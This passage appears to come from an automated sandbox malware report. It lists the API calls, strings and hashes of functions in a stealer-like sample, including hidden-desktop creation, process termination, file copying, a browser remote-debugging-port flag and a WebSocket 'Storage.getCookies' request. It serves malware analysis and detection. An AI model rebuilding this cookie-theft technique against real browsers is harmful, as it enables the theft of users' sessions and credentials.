                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 88078b9e641ff9c2993e22957ae99fe02cb5e1416431afe9b35833ec8569e0e4
                                • Instruction ID: bc5477ef6e8b55cafbeba2ac9226027dafe28dc32ce3c8dbbb45b105d8e7e888
                                • Opcode Fuzzy Hash: 88078b9e641ff9c2993e22957ae99fe02cb5e1416431afe9b35833ec8569e0e4
                                • Instruction Fuzzy Hash: 06C17331A112069FCB21FF69DC89AAE77F8EF45314F098028BC5AE3151DB34ED069B90
                                APIs
                                • memset.MSVCRT ref: 00C79790
                                • lstrcat.KERNEL32(?,?), ref: 00C797A0
                                • lstrcat.KERNEL32(?,?), ref: 00C797B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00C797C3
                                • memset.MSVCRT ref: 00C797D7
                                  • Part of subcall function 00C93E70: lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C93EA5
                                  • Part of subcall function 00C93E70: lstrcpy.KERNEL32(00000000,0179E248), ref: 00C93ECF
                                  • Part of subcall function 00C93E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00C7134E,?,0000001A), ref: 00C93ED9
                                • wsprintfA.USER32 ref: 00C79806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00C79827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00C79844
                                  • Part of subcall function 00C946A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C946B9
                                  • Part of subcall function 00C946A0: Process32First.KERNEL32(00000000,00000128), ref: 00C946C9
                                  • Part of subcall function 00C946A0: Process32Next.KERNEL32(00000000,00000128), ref: 00C946DB
                                  • Part of subcall function 00C946A0: StrCmpCA.SHLWAPI(?,?), ref: 00C946ED
                                  • Part of subcall function 00C946A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C94702
                                  • Part of subcall function 00C946A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C94711
                                  • Part of subcall function 00C946A0: CloseHandle.KERNEL32(00000000), ref: 00C94718
                                  • Part of subcall function 00C946A0: Process32Next.KERNEL32(00000000,00000128), ref: 00C94726
                                  • Part of subcall function 00C946A0: CloseHandle.KERNEL32(00000000), ref: 00C94731
                                • lstrcat.KERNEL32(00000000,?), ref: 00C79878
                                • lstrcat.KERNEL32(00000000,?), ref: 00C79889
                                • lstrcat.KERNEL32(00000000,00CA4B60), ref: 00C7989B
                                • memset.MSVCRT ref: 00C798AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00C798D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C79903
                                • StrStrA.SHLWAPI(00000000,0179EF30), ref: 00C79919
                                • lstrcpyn.KERNEL32(00EA93D0,00000000,00000000), ref: 00C79938
                                • lstrlen.KERNEL32(?), ref: 00C7994B
                                • wsprintfA.USER32 ref: 00C7995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 00C79971
                                • Sleep.KERNEL32(00001388), ref: 00C799E7
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                  • Part of subcall function 00C792B0: strlen.MSVCRT ref: 00C792E1
                                  • Part of subcall function 00C792B0: strlen.MSVCRT ref: 00C792FA
                                  • Part of subcall function 00C792B0: strlen.MSVCRT ref: 00C79399
                                  • Part of subcall function 00C792B0: strlen.MSVCRT ref: 00C793E6
                                  • Part of subcall function 00C94740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00C94759
                                  • Part of subcall function 00C94740: Process32First.KERNEL32(00000000,00000128), ref: 00C94769
                                  • Part of subcall function 00C94740: Process32Next.KERNEL32(00000000,00000128), ref: 00C9477B
                                  • Part of subcall function 00C94740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9479C
                                  • Part of subcall function 00C94740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C947AB
                                  • Part of subcall function 00C94740: CloseHandle.KERNEL32(00000000), ref: 00C947B2
                                  • Part of subcall function 00C94740: Process32Next.KERNEL32(00000000,00000128), ref: 00C947C0
                                  • Part of subcall function 00C94740: CloseHandle.KERNEL32(00000000), ref: 00C947CB
                                • CloseDesktop.USER32(?), ref: 00C79A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 75bbe77509695ff58b728b05cea574e58c98848e4aee83b85925b871a9343fd2
                                • Instruction ID: 2cbeb5a1ea1682d43c5a5ea5b68463383f46045a3dc088f4d5b297b05f235035
                                • Opcode Fuzzy Hash: 75bbe77509695ff58b728b05cea574e58c98848e4aee83b85925b871a9343fd2
                                • Instruction Fuzzy Hash: 49916471A50208AFDB10DFB4DC89FDE77B8EF49700F1485A5F60DA7191DB70AA489BA0
                                APIs
                                • wsprintfA.USER32 ref: 00C8E22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C8E243
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8E263
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C8E27D
                                • wsprintfA.USER32 ref: 00C8E2A2
                                • StrCmpCA.SHLWAPI(?,00C9CFEC), ref: 00C8E2B4
                                • wsprintfA.USER32 ref: 00C8E2D1
                                  • Part of subcall function 00C8EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00C8EE12
                                • wsprintfA.USER32 ref: 00C8E2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00C8E304
                                • lstrcat.KERNEL32(?,0179F488), ref: 00C8E335
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8E347
                                • lstrcat.KERNEL32(?,?), ref: 00C8E358
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8E36A
                                • lstrcat.KERNEL32(?,?), ref: 00C8E37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00C8E394
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E422
                                • DeleteFileA.KERNEL32(?), ref: 00C8E45C
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8E49B
                                • FindClose.KERNEL32(00000000), ref: 00C8E4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: 26abda5fe6dee024bd915bee1e62cb9c1d6b22a290f57cf3435c9b011848b638
                                • Instruction ID: 25d436c2f04a2cafaf6ab38ad3a53d8a70e328d7e427dae90c88fbd27d283db9
                                • Opcode Fuzzy Hash: 26abda5fe6dee024bd915bee1e62cb9c1d6b22a290f57cf3435c9b011848b638
                                • Instruction Fuzzy Hash: DB81647190021D9FCB24EFA5DD49AEE77B9FF89304F0485A8B51AA3151DB34AA48CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C716E2
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7176C
                                • lstrcat.KERNEL32(00000000), ref: 00C71776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C717A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C718F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C718FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: 107d6f45505f3c6eaf0ae573b9ea36a13ded3cbeb33ccf7e36aaf3ea221ae359
                                • Instruction ID: 78b3d8625618d76bd4a176c40379cd098357b55f3847d07ffba73ff48429d448
                                • Opcode Fuzzy Hash: 107d6f45505f3c6eaf0ae573b9ea36a13ded3cbeb33ccf7e36aaf3ea221ae359
                                • Instruction Fuzzy Hash: 6F815E3191121A9FCB21EFA8D889AAE77F4EF55310F09C124FD1DA7252DB30AE05DB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C8DD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C8DD4C
                                • wsprintfA.USER32 ref: 00C8DD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C8DD79
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8DD9C
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C8DDB6
                                • wsprintfA.USER32 ref: 00C8DDD4
                                • DeleteFileA.KERNEL32(?), ref: 00C8DE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00C8DDED
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                  • Part of subcall function 00C8D980: memset.MSVCRT ref: 00C8D9A1
                                  • Part of subcall function 00C8D980: memset.MSVCRT ref: 00C8D9B3
                                  • Part of subcall function 00C8D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8D9DB
                                  • Part of subcall function 00C8D980: lstrcpy.KERNEL32(00000000,?), ref: 00C8DA0E
                                  • Part of subcall function 00C8D980: lstrcat.KERNEL32(?,00000000), ref: 00C8DA1C
                                  • Part of subcall function 00C8D980: lstrcat.KERNEL32(?,0179ECF0), ref: 00C8DA36
                                  • Part of subcall function 00C8D980: lstrcat.KERNEL32(?,?), ref: 00C8DA4A
                                  • Part of subcall function 00C8D980: lstrcat.KERNEL32(?,0179D778), ref: 00C8DA5E
                                  • Part of subcall function 00C8D980: lstrcpy.KERNEL32(00000000,?), ref: 00C8DA8E
                                  • Part of subcall function 00C8D980: GetFileAttributesA.KERNEL32(00000000), ref: 00C8DA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8DE2E
                                • FindClose.KERNEL32(00000000), ref: 00C8DE3D
                                • lstrcat.KERNEL32(?,0179F488), ref: 00C8DE66
                                • lstrcat.KERNEL32(?,0179E030), ref: 00C8DE7A
                                • lstrlen.KERNEL32(?), ref: 00C8DE84
                                • lstrlen.KERNEL32(?), ref: 00C8DE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8DED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: f675c1fd588d1ae95381dbe58cc29657f2812ca16ee0878fc20f97a9dfbc4e69
                                • Instruction ID: 369389dc77a2c136c3c587d3bfd28d6f46e7d482579ae39e2e84c2890de7ad45
                                • Opcode Fuzzy Hash: f675c1fd588d1ae95381dbe58cc29657f2812ca16ee0878fc20f97a9dfbc4e69
                                • Instruction Fuzzy Hash: 52616375900209AFCB10EF64DD89ADE77B9FF88314F0485A4B50AE7291DB34AA48DB50
                                APIs
                                • wsprintfA.USER32 ref: 00C8D54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C8D564
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8D584
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C8D59E
                                • lstrcat.KERNEL32(?,0179F488), ref: 00C8D5E3
                                • lstrcat.KERNEL32(?,0179F4F8), ref: 00C8D5F7
                                • lstrcat.KERNEL32(?,?), ref: 00C8D60B
                                • lstrcat.KERNEL32(?,?), ref: 00C8D61C
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8D62E
                                • lstrcat.KERNEL32(?,?), ref: 00C8D642
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8D682
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8D6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8D737
                                • FindClose.KERNEL32(00000000), ref: 00C8D746
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 30530722ca3294b10e274e683534041a8bcf4875c46efdeb75105cca5161e196
                                • Instruction ID: 0ebafd3f9ca86725d90b6b1ef85ce5a08bd60500cfe4b492a8235580f36a941a
                                • Opcode Fuzzy Hash: 30530722ca3294b10e274e683534041a8bcf4875c46efdeb75105cca5161e196
                                • Instruction Fuzzy Hash: 9E6162759102199FCB20EF75DC88ADE77B8EF49314F0484A5F65AA3241EB34AB48CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: f35cda0597ed2082f7e5fbd448d364f5d52e4a12344ba16a165b8c9af0001b67
                                • Instruction ID: de61f8daec3256c0bd1ff6eec267d343751d3ab1404e29ee44ba192517c590d0
                                • Opcode Fuzzy Hash: f35cda0597ed2082f7e5fbd448d364f5d52e4a12344ba16a165b8c9af0001b67
                                • Instruction Fuzzy Hash: 7FA25871D012699FDF24DBA8C884BEDBBB6BF48300F1481AAD519A7241DB705F86DF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C823D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C823F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C82402
                                • lstrlen.KERNEL32(\*.*), ref: 00C8240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00C82436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C82486
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
